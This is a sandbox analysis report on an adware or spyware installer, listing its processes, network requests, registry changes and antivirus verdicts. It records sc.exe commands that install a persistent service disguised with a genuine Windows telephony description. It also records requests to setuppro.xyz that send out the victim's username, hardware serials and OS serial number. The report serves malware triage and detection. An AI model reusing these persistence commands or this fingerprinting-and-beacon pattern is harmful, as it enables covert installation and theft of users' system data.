Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 26, 2022, 5:42 p.m. | Aug. 26, 2022, 5:45 p.m. |

Process | Command line | PID |
---|---|---|
ultrasetup.tmp | "C:\Users\test22\AppData\Local\Temp\is-35A0F.tmp\ultrasetup.tmp" /SL5="$B0138,1092675,831488,C:\Users\test22\AppData\Local\Temp\ultrasetup.exe" | 2912 |
ultrasetup.tmp | "C:\Users\test22\AppData\Local\Temp\is-UNNOR.tmp\ultrasetup.tmp" /SL5="$C0138,1092675,831488,C:\Users\test22\AppData\Local\Temp\ultrasetup.exe" /VERYSILENT | 2140 |
sc.exe | "C:\Windows\system32\sc.exe" create Telephone404 start= auto DisplayName= "Telephone404" binPath= "C:\Windows\test22-pc\Runtimebroker8.exe" | 2176 |
sc.exe | "C:\Windows\system32\sc.exe" description Telephone404 "Provides Telephony API (TAPI) support for programs that control telephony devices on the local computer and, through the LAN, on servers that are also running the service." | 2280 |
sc.exe | "C:\Windows\system32\sc.exe" start Telephone404 | 2404 |
explorer.exe | C:\Windows\Explorer.EXE | 1156 |

Name | Response | Post-Analysis Lookup |
---|---|---|
setuppro.xyz | 74.208.236.195 |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS

Indicator | Value |
---|---|
section | .itext |
section | .didata |
suspicious_request | GET http://setuppro.xyz/guid.php (GET with no User-Agent header) |
suspicious_request | GET http://setuppro.xyz/express.php?uid=25528BB73ece216 (GET with no User-Agent header) |
request | GET http://setuppro.xyz/iam/ins.php?SMAC=&User=test22<o>PC<q>test22&UUID=25528BB7-B449-A342-B397-00D24064AA0D&Vendor=innotekGmbH&Name=VirtualBox&HDDSerialNumber=VB4b297b00-73ece216&Caption=MicrosoftWindows7ProfessionalKN&OSArchitectures=64-bit&OSerialNumber=61417-561-4045436-92488&ProcessorName=Intel(R)Core(TM)i5-8400CPU@2.80GHz&RAM=5368242176&version=1.52&publisherid=installer |
request | GET http://setuppro.xyz/iam/i.php?mid=25528BB73ece216&mac=&publisherid=installer&company=youk&pubid=0&advid=0 |
request | GET http://setuppro.xyz/guid.php |
request | GET http://setuppro.xyz/express.php?uid=25528BB73ece216 |
file | C:\Users\test22\AppData\Local\Temp\is-35A0F.tmp\ultrasetup.tmp |
cmdline | "C:\Windows\system32\sc.exe" create Telephone404 start= auto DisplayName= "Telephone404" binPath= "C:\Windows\test22-pc\Runtimebroker8.exe" |
cmdline | "C:\Windows\system32\sc.exe" description Telephone404 "Provides Telephony API (TAPI) support for programs that control telephony devices on the local computer and, through the LAN, on servers that are also running the service." |
cmdline | "C:\Windows\system32\sc.exe" start Telephone404 |
service_name | Telephone404 |
service_path | C:\Windows\test22-pc\Runtimebroker8.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0018.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_002.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Support_Chat_001.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0015.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Support Chat.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_003.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0012.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_008.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_004.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0011.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_005.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0010.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0017.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_007.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BEHAVIORS\Support Chat.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0019.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0020.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0013.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0016.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_009.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_0014.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_006.exe |
registry | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Notification_001.exe |

Engine | Detection |
---|---|
Lionic | Heuristic.File.Generic.00x1!p |
Cynet | Malicious (score: 100) |
McAfee | Artemis!036CAB509F3D |
Cylance | Unsafe |
Sangfor | Adware.Win32.Installcommerce.Vuvx |
K7AntiVirus | Adware ( 00588bef1 ) |
Alibaba | AdWare:Win32/InstallCommerce.28e3927d |
K7GW | Adware ( 00588bef1 ) |
Cyren | W32/ABAdware.MNTG-9118 |
Symantec | Trojan.Gen.MBT |
Elastic | malicious (high confidence) |
ESET-NOD32 | a variant of Win32/Adware.InstallCommerce.A |
Paloalto | generic.ml |
Kaspersky | Trojan-Spy.Win32.Agent.kbav |
Avast | Win32:AdwareX-gen [Adw] |
Tencent | Win32.Trojan-spy.Agent.Dlc |
McAfee-GW-Edition | BehavesLike.Win32.DStudio.tc |
Sophos | Generic PUA AP (PUA) |
Ikarus | PUA.InstallCommerce |
Avira | ADWARE/Redcap.xmawi |
Gridinsoft | Adware.Win32.Agent.cl |
ZoneAlarm | Trojan-Spy.Win32.Agent.kbav |
GData | Win32.Application.Agent.HK2FNJ |
AhnLab-V3 | Malware/Win.Generic.C5190282 |
Malwarebytes | PUP.Optional.BundleInstaller |
TrendMicro-HouseCall | TROJ_GEN.R002H07G622 |
Rising | Adware.InstallCommerce!8.12CF8 (TFE:5:85cPZ46todH) |
Fortinet | Riskware/InstallCommerce |
AVG | Win32:AdwareX-gen [Adw] |